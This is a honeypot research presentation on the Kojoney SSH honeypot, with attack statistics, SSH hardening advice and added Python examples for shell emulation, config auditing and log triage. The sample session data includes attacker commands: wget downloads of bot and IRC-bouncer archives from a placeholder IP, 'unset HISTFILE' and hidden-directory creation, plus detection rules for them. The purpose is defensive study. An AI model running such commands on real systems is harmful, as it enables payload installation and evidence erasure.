Copyright 2010 Justin C. Klein Keane Using Kojoney Open Source Low Interaction Honeypot to Develop Defensive Strategies and Fingerprint Post-Compromise.


Using Kojoney Open Source Low Interaction Honeypot to Develop Defensive Strategies and Fingerprint Post-Compromise Behavior
Justin C. Klein Keane, Sr. InfoSec Specialist, University of Pennsylvania, School of Arts and Sciences

Background
- SSH
  - Secure replacement for telnet
  - RFC-defined (open) protocol
  - Available on most Linux/Unix machines
- Ongoing brute force attacks are seen on SSH servers
- Unfortunately we don't know what attackers are after
  - Tempting logical fallacy to assume motivation
  - Threat modeling and risk analysis depend on knowing motivation

Honeypots
- What is a honeypot?
  - A service deliberately configured to attract malicious attention
- Why would you use one?
  - Tar pit: waste attacker time
  - Early warning: warn of attacks
  - Profiling: determine the types of attacks being used against your resources

Types of Honeypots
- High interaction
  - Full system installation
  - Advantage: the attacker has a full stack to interact with
  - Disadvantage: the attacker has more tools, and could hide or break out of the honeypot
- Low interaction
  - Software implementation that simulates a system
  - Controlled environment, but much easier for attackers to detect

Danger!
- Downstream liability
  - Attackers could use your honeypot as a launching pad to attack others
  - Attackers could host malicious content on your server
  - Attackers could use your honeypot as a dump site for illegal material
- Pivot point
  - Attackers could end-run access control to internal resources using the honeypot

Logistical Considerations
- Resource intensive
  - Setup is time consuming: installation of the OS and configuration of software
  - Analysis: it takes time to pore through logs and recreate attacker activity
  - Redeployment can be a hassle, although virtual machine snapshots make this much easier

Kojoney
- Open source low interaction SSH honeypot
  - Written in Python, so it should work on any platform
- Has some flaws...
  - Static timestamps, many commands unsupported, limited filesystem, etc.

How Kojoney Works
- How it works
  - Negotiates a full SSH session with attackers
  - Takes attacker input, logs it, examines it and responds with simulated output
  - Allows attackers to download toolkits with wget and curl, but stores the files outside the sandbox

Customization
- Modified interaction to appear more dynamic
- Updated directories, since using the defaults can be a dead giveaway
- Added directory functionality so attackers can navigate the structure and create and remove directories
- Added support for "requested" commands: if we saw attempts to use an unsupported command, we built support in
- Added MySQL database support, where all login data and commands are stored, which makes reporting and analysis much easier
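As an added illustration of the loop the last two slides describe (take a command, log it, consult a simulated filesystem, answer with canned output) together with the customizations listed here (navigable directories, mkdir/rmdir, a dynamic timestamp, downloads captured rather than fetched), here is a small Python emulator. It is not Kojoney's code; the SSH transport is omitted, commands are fed in as strings, and the directory tree, the user "admin" and the command set are constructed for the example.

```python
"""Minimal low-interaction shell emulator in the spirit of Kojoney.

Added illustration only, not Kojoney's own code. The fake directory tree,
the home directory and the supported command set are assumptions.
"""
import posixpath
import time


class FakeShell:
    def __init__(self):
        # Simulated filesystem: only directory paths are modelled (constructed tree).
        self.dirs = {"/", "/home", "/home/admin", "/tmp", "/var", "/var/log"}
        self.cwd = "/home/admin"
        self.log = []        # every line typed, in order (the session transcript)
        self.downloads = []  # URLs requested via wget/curl, captured rather than fetched

    def _abs(self, path):
        # Resolve a relative or absolute path against the current directory.
        if not path.startswith("/"):
            path = posixpath.join(self.cwd, path)
        return posixpath.normpath(path)

    def run(self, line):
        """Log the command, dispatch it, and return the simulated output."""
        self.log.append(line)
        argv = line.strip().split()
        if not argv:
            return ""
        cmd, args = argv[0], argv[1:]
        handler = getattr(self, "cmd_" + cmd, None)
        if handler is None:
            # Unsupported commands are still logged; reviewing them is how the
            # "requested" commands on the slide were identified.
            return "-bash: %s: command not found" % cmd
        return handler(args)

    def cmd_pwd(self, args):
        return self.cwd

    def cmd_cd(self, args):
        target = self._abs(args[0]) if args else "/home/admin"
        if target not in self.dirs:
            return "-bash: cd: %s: No such file or directory" % args[0]
        self.cwd = target
        return ""

    def cmd_ls(self, args):
        base = self._abs(args[0]) if args else self.cwd
        if base not in self.dirs:
            return "ls: cannot access %s: No such file or directory" % args[0]
        names = sorted(posixpath.basename(d) for d in self.dirs
                       if d != base and posixpath.dirname(d) == base)
        return "  ".join(names)

    def cmd_mkdir(self, args):
        for a in args:
            self.dirs.add(self._abs(a))
        return ""

    def cmd_rmdir(self, args):
        for a in args:
            self.dirs.discard(self._abs(a))
        return ""

    def cmd_date(self, args):
        # Dynamic clock instead of the static timestamp the slides call a flaw.
        return time.strftime("%a %b %d %H:%M:%S %Z %Y")

    def cmd_wget(self, args):
        urls = [a for a in args if a.startswith(("http://", "https://", "ftp://"))]
        self.downloads.extend(urls)
        # Nothing is fetched here; a deployment would retrieve the file into a
        # quarantine directory outside the emulated filesystem, as the slide says.
        return "\n".join("Saving to: `%s'" % (posixpath.basename(u) or "index.html")
                         for u in urls)

    cmd_curl = cmd_wget


if __name__ == "__main__":
    shell = FakeShell()
    for line in ["pwd", "cd /tmp", "mkdir .tmp", "ls", "wget http://198.51.100.9/bot.tgz", "id"]:
        print("$ " + line)
        print(shell.run(line))
    print("downloads captured:", shell.downloads)
```

The transcript in `shell.log` and the URL list in `shell.downloads` are the two records a real deployment would write to the MySQL tables the slide mentions.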

Setup
- Kojoney running October 27, 2009, through May 3
- Commodity desktop hardware, just an old Pentium-powered machine with 512 MB RAM
- Dedicated IP
- Separate management interface

Data Set
- Observed 109,121 login attempts
- 596 distinct IP addresses
- 70 IPs participated in multiple attacks
- Longest span between attacks was 135 days

Attacks per Hour

Attacks per Day

Attacks per Month

Top 16 Attacks by Country

Top 20 Usernames

Top 20 Passwords

Most Popular Commands (3,062 issued, 181 distinct)

Distinct Commands

Commands by Session

Wget Downloads
- 282 downloads captured
- Windows XP SP3 downloaded 41 times
- Other popular downloads:
  - PsyBNC
  - Other IRC bots
  - UDP ping flooders
  - Port scanners
  - SSH brute force tools

Attack Command Analysis
- Context is key
  - In 94 of 150 uses, 'cat' was invoked as: cat /proc/cpuinfo
- Some attacker commands are innocuous, others are not:
  - w
  - uptime
  - wget
  - unset

Target Accounts
- System accounts were the favorite targets
- Dictionary lists were uncommon
- Passwords were relatively complex
  - Dictionary attacks were uncommon
- Username 'alice' with password 'password' would have withstood the observed attacks

Defensive Strategies
- Use SSH keys
- Disable remote root login over SSH
- Run SSH on an alternate port
- Use login attempt limits to frustrate brute force
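An added Python checker (not part of the presentation) that audits an sshd_config against these four recommendations. It pairs a constructed weak configuration with its hardened counterpart; the parser honours sshd's first-match rule for repeated keywords, strips comments and stops at the first Match block. The DEFAULTS table is an assumption for keywords that are absent (modern OpenSSH defaults; an older server may differ).

```python
"""Audit an sshd_config for the four settings on this slide.

Added example, not the presentation's code. DEFAULTS are assumed values for
absent keywords (modern OpenSSH defaults).
"""
import re

# Constructed "before" configuration with the weak settings.
WEAK_CONFIG = """\
# default-ish sshd_config
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
"""

# Constructed "after" configuration applying the slide's advice.
HARDENED_CONFIG = """\
Port 2222
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
MaxAuthTries 3
"""

DEFAULTS = {
    "port": "22",
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "maxauthtries": "6",
}

# sshd accepts both "Keyword value" and "Keyword=value".
KEYWORD_RE = re.compile(r"^([A-Za-z0-9]+)\s*=?\s*(.*)$")


def parse_sshd_config(text):
    """Return {keyword: value} (keywords lower-cased) for the global section."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break                              # only audit the global settings
        settings.setdefault(key, value)       # sshd keeps the first value it sees
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means all four checks passed."""
    s = parse_sshd_config(text)

    def get(key):
        return s.get(key, DEFAULTS[key]).lower()

    findings = []
    if get("permitrootlogin") != "no":
        findings.append("PermitRootLogin is '%s'; set it to 'no'" % get("permitrootlogin"))
    if get("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is enabled; use SSH keys and set it to 'no'")
    if get("port") == "22":
        findings.append("Port is 22 (the default); run sshd on an alternate port")
    tries = int(get("maxauthtries"))
    if tries > 3:
        findings.append("MaxAuthTries is %d; lower it to limit attempts per connection" % tries)
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, "->", audit_sshd_config(cfg) or "OK")
```

MaxAuthTries only caps guesses per connection; the login attempt limit on the slide also needs a per-source rate limit (firewall or OSSEC), which the detection example later on this page produces input for.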

Detection Mechanisms
- Blacklist using:
  - OSSEC
  - SSH Black

Conclusions
- Blocking by source IP may be feasible
- Limit access by time of day
- Use IP to seed examination of other logs
- 'Trojan' certain programs to log activity
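An added Python example (not part of the presentation) that turns sshd log lines into the three actions the detection and conclusion slides list: a blocklist of brute-forcing sources (the kind of list an OSSEC active response or firewall deny rule consumes), a time-of-day check on successful logins, and a seed search that looks for the same addresses in another service's log. The auth.log and web-log lines are constructed samples in syslog and Apache combined formats, not captured traffic; the threshold of five failures and the 06:00 to 22:00 window are assumptions.

```python
"""sshd log triage: blocklist candidates, off-hours logins, seed search.

Added example, not the presentation's code. Log lines are constructed samples.
"""
import re
from collections import Counter, defaultdict

AUTH_LOG = """\
Mar  3 02:14:01 web01 sshd[2101]: Failed password for invalid user oracle from 198.51.100.23 port 51002 ssh2
Mar  3 02:14:03 web01 sshd[2103]: Failed password for root from 198.51.100.23 port 51010 ssh2
Mar  3 02:14:05 web01 sshd[2105]: Failed password for invalid user test from 198.51.100.23 port 51019 ssh2
Mar  3 02:14:08 web01 sshd[2107]: Failed password for invalid user admin from 198.51.100.23 port 51027 ssh2
Mar  3 02:14:10 web01 sshd[2109]: Failed password for root from 198.51.100.23 port 51033 ssh2
Mar  3 03:02:40 web01 sshd[2310]: Failed password for root from 192.0.2.44 port 33110 ssh2
Mar  3 03:05:10 web01 sshd[2312]: Accepted password for root from 192.0.2.44 port 33120 ssh2
Mar  3 09:30:11 web01 sshd[2200]: Failed password for alice from 203.0.113.7 port 40001 ssh2
Mar  3 09:30:20 web01 sshd[2202]: Accepted publickey for alice from 203.0.113.7 port 40002 ssh2
"""

WEB_LOG = """\
198.51.100.23 - - [03/Mar/2010:02:20:15 -0500] "GET /phpmyadmin/ HTTP/1.1" 404 512
203.0.113.7 - - [03/Mar/2010:09:31:02 -0500] "GET /index.html HTTP/1.1" 200 1024
"""

SSHD_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<hh>\d\d):\d\d:\d\d \S+ sshd\[\d+\]: "
    r"(?P<status>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text):
    """Parse sshd 'Failed/Accepted ... for <user> from <ip>' lines into dicts."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            e = m.groupdict()
            e["hour"] = int(e["hh"])
            events.append(e)
    return events


def brute_force_sources(events, threshold=5):
    """Source IPs with at least `threshold` failed logins: blocklist candidates."""
    fails = Counter(e["ip"] for e in events if e["status"] == "Failed")
    return {ip: n for ip, n in fails.items() if n >= threshold}


def off_hours_logins(events, allowed=(6, 22)):
    """Successful logins outside the allowed [start, end) hours (local time)."""
    start, end = allowed
    return [e for e in events
            if e["status"] == "Accepted" and not (start <= e["hour"] < end)]


def seed_search(ips, text):
    """Lines in another log mentioning any seed IP; token match so that
    10.0.0.1 does not match 10.0.0.11."""
    hits = defaultdict(list)
    for line in text.splitlines():
        tokens = set(line.split())
        for ip in ips:
            if ip in tokens:
                hits[ip].append(line)
    return dict(hits)


if __name__ == "__main__":
    ev = parse_auth_log(AUTH_LOG)
    block = brute_force_sources(ev)
    print("blocklist candidates:", block)
    print("off-hours logins:", [(e["user"], e["ip"], e["hh"]) for e in off_hours_logins(ev)])
    print("seed hits in web log:", seed_search(block, WEB_LOG))
```

Run against the sample, the brute-forcing source also shows up probing the web server twenty minutes later, which is exactly the cross-log correlation the "seed" bullet is after.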

Known Hostile Traffic
- Look for internal source
- Use IP as seed for log analysis
- Fingerprint malware captures
- Look for traceable activity
  - Creating directories with names like .tmp
  - unset history
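An added Python example (not the presentation's code or Kojoney's) that applies the Attack Command Analysis and Known Hostile Traffic slides to a honeypot command log: it produces the issued/distinct counts and ranking that the command slides chart, and classifies each command in context, so that 'cat' is innocuous except as cat /proc/cpuinfo, download commands are tied to their URL, and the traceable .tmp directories and history-unsetting are flagged per session. SESSIONS is a constructed transcript in the (session_id, command) shape one would pull from the MySQL table mentioned under Customization; it is not captured data, and the category names are my own.

```python
"""Honeypot command analysis: frequency, and per-session indicators in context.

Added example, not the presentation's code. SESSIONS is constructed sample data.
"""
import posixpath
import re
import shlex
from collections import Counter

SESSIONS = [
    ("s1", "w"),
    ("s1", "cat /proc/cpuinfo"),
    ("s1", "uptime"),
    ("s1", "unset HISTFILE"),
    ("s1", "cd /var/tmp"),
    ("s1", "mkdir .tmp"),
    ("s1", "cd .tmp"),
    ("s1", "wget http://198.51.100.9/psybnc.tar.gz"),
    ("s2", "cat /etc/issue"),
    ("s2", "ls -la"),
    ("s2", "cat /proc/cpuinfo"),
    ("s3", "uptime"),
    ("s3", "w"),
]

URL_RE = re.compile(r"^(https?|ftp)://")


def split_args(line):
    try:
        return shlex.split(line)
    except ValueError:          # unbalanced quotes in attacker input
        return line.split()


def command_stats(sessions):
    """Issued/distinct counts and a ranked list, keyed on the base command."""
    counts = Counter(split_args(cmd)[0] for _, cmd in sessions if cmd.strip())
    return {"issued": sum(counts.values()), "distinct": len(counts),
            "ranked": counts.most_common()}


def classify(line):
    """Return (category, detail); anything other than 'benign' is an indicator."""
    argv = split_args(line)
    if not argv:
        return ("benign", "")
    cmd, args = argv[0], argv[1:]
    if cmd == "cat" and any(a.startswith("/proc/") for a in args):
        return ("recon-hardware", " ".join(args))      # e.g. cat /proc/cpuinfo
    if cmd in ("w", "uptime", "who", "uname", "id"):
        return ("recon-host", cmd)
    if cmd in ("wget", "curl"):
        urls = [a for a in args if URL_RE.match(a)]
        return ("download", urls[0] if urls else "")
    if (cmd == "unset" and any(a.startswith("HIST") for a in args)) \
            or (cmd == "history" and "-c" in args) \
            or (cmd == "export" and any(a.startswith("HISTFILE=") for a in args)):
        return ("anti-forensics", line)
    if cmd == "mkdir" and any(posixpath.basename(a).startswith(".") for a in args):
        return ("hidden-dir", args[-1])
    return ("benign", cmd)


HOSTILE = {"download", "anti-forensics", "hidden-dir"}


def session_report(sessions):
    """Per session: command count, category tally, and a hostile flag set when
    any download, anti-forensics or hidden-directory indicator appears."""
    report = {}
    for sid, cmd in sessions:
        entry = report.setdefault(sid, {"commands": 0, "categories": Counter(), "hostile": False})
        cat, _ = classify(cmd)
        entry["commands"] += 1
        entry["categories"][cat] += 1
        if cat in HOSTILE:
            entry["hostile"] = True
    return report


if __name__ == "__main__":
    print(command_stats(SESSIONS))
    for sid, entry in session_report(SESSIONS).items():
        print(sid, entry["commands"], dict(entry["categories"]),
              "hostile" if entry["hostile"] else "")
```

Sessions s2 and s3 only look around and are left unflagged, while s1 trips all three hostile categories; the captured URL in its download indicator is what the "fingerprint malware captures" bullet would start from.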